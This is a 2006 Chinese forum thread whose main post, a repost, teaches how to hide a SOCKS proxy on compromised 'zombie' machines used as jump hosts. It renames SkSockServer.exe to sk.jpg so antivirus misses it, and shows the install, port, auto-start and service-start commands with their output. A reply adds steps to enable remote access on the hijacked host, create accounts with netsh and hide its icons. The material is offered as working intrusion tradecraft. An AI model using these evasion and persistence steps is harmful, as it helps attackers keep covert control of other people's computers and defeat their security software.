中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名:www.cn-dos.net 论坛域名:www.cn-dos.net/forum
DOS,代表着自由开放与发展,我们努力起来,学习FreeDOS和Linux的自由开放与GNU精神,共同创造和发展美好的自由与GNU GPL世界吧!

中国DOS联盟论坛
现在时间是 2026-06-26 07:29
中国DOS联盟论坛 » 贴图灌水、文学娱乐专区 » [转贴]用cmd躲过肉鸡病毒防火墙 查看 1,378 回复 3
楼 主 [转贴]用cmd躲过肉鸡病毒防火墙 发表于 2006-07-04 13:06 ·  中国 上海 松江区 电信
铂金会员
★★★★
DOS一根葱
积分 5,493
发帖 2,315
注册 2006-05-01 10:41
20年会员
UID 54766
性别 男
来自 上海
状态 离线
因为我在学校上的是教育网。要扫国外的主机需要靠跳板。
但很多软件都已经被列为病毒!
比如:opentelnet,ca等,放到肉鸡上很可能就被杀掉....不爽
连SkSockServer都被列为病毒...郁闷啊!!
经过几次尝试,我想到了一种简单的躲过杀毒软件的方法。那就是更改可执行程序的扩展名。
比如我们可以把SkSockServer.exe更改为sk.jpg
这样的话,杀毒软件就查不出来了。
在直接双击执行更改过扩展名的程序时候,系统便会询问用什么方式打开,也就是说windows也认不出来。
但是我们在cmd命令行中却可以执行。是不是很神奇???而且和没改扩展名的时候效果是一样的。
不同的是,当我们要执行更改了扩展名的程序时候需要打全名(把扩展名也打上)。
下面是我在本机上安装sksockserver(sk.jpg):

首先:
我们利用没改扩展名的程序:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
E:\>SkSockServer -install
拒绝访问。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
这时就弹出瑞星的病毒提示,说发现病毒!
下面我们看看改过扩展名的。

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
E:\>sk.jpg -install
Snake SockProxy Service installed.
E:\>sk.jpg -config port 1800
The Port value have set to 1800
E:\>sk.jpg -config starttype 2
The New StartType have set to 2 -- Auto
E:\>net start skserver
Snake SockProxy Service 服务正在启动 .
Snake SockProxy Service 服务已经启动成功。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ok!成功!
现在我们不怕杀毒软件了!而其他的在命令行执行的程序也可以用这种方法。
我就不一一叙述了。

原理:
其实原理很简单,我们利用了cmd判断文件类型的方法:
在CMD中,系统首先判断文件的类型是否是执行文件,
判断方法不是文件扩展名,而是文件头的PE段。
如是执行文件,则执行它。
如不是,再根据相应的关联启动相应程序。
如没有输入扩展名,则系统将默认扩展名为BAT,EXE,COM
依次判断。
也就是说,程序更改了扩展名后,只有cmd.exe能“认”出它来,
因为cmd不是根据扩展名来判断文件类型的。
而windows是靠扩展名来判断文件类型的.
这样,我们就可以骗过windows和杀毒软件
2 发表于 2006-07-04 15:38 ·  中国 四川 成都 联通
铂金会员
★★★★
积分 7,493
发帖 2,672
注册 2005-09-02 00:00
20年会员
UID 42173
性别 男
状态 离线
snake的那个跳板也太老了点吧,推荐这个:

http://www.ph4nt0m.org/bbs/showthread.php?s=&threadid=34730&highlight=%2A

另外,我也逐渐不用跳板了,客户端设置有点烦了,推荐建立VPN,速度绝对一流,而且封包比socks5完全。如果对方是共网IP,你还能免费得到一个共网的IP哦~~~

1.在cmdshell里

net start "route and remote access"

2.用netsh给ras添加帐号

3.隐藏系统托盘和“网络连接”里的图标

现在我正在研究第2和3步~~

C:\>BLOG http://initiative.yo2.cn/
C:\>hh.exe ntcmds.chm::/ntcmds.htm
C:\>cmd /cstart /MIN "" iexplore "about:<bgsound src='res://%ProgramFiles%\Common Files\Microsoft Shared\VBA\VBA6\vbe6.dll/10/5432'>"
3 发表于 2006-07-08 15:39 ·  中国 福建 泉州 电信
高级用户
★★
论坛灌水专业户
积分 613
发帖 266
注册 2006-04-19 22:47
20年会员
UID 54113
来自 河南省
状态 离线
晕啊...........
饮马恒河畔,剑指天山西,碎叶城揽月,库叶岛赏雪,黑海之滨垂钓,贝尔加湖面张弓;中南半岛访古,东京废墟祭祖!
4 发表于 2006-07-12 19:53 ·  中国 安徽 铜陵 移动
中级用户
★★
积分 230
发帖 104
注册 2006-04-21 12:22
20年会员
UID 54192
性别 男
状态 离线
高啊,服了
━━━━━━━
漏漏®的e
━━━━━━━
论坛跳转: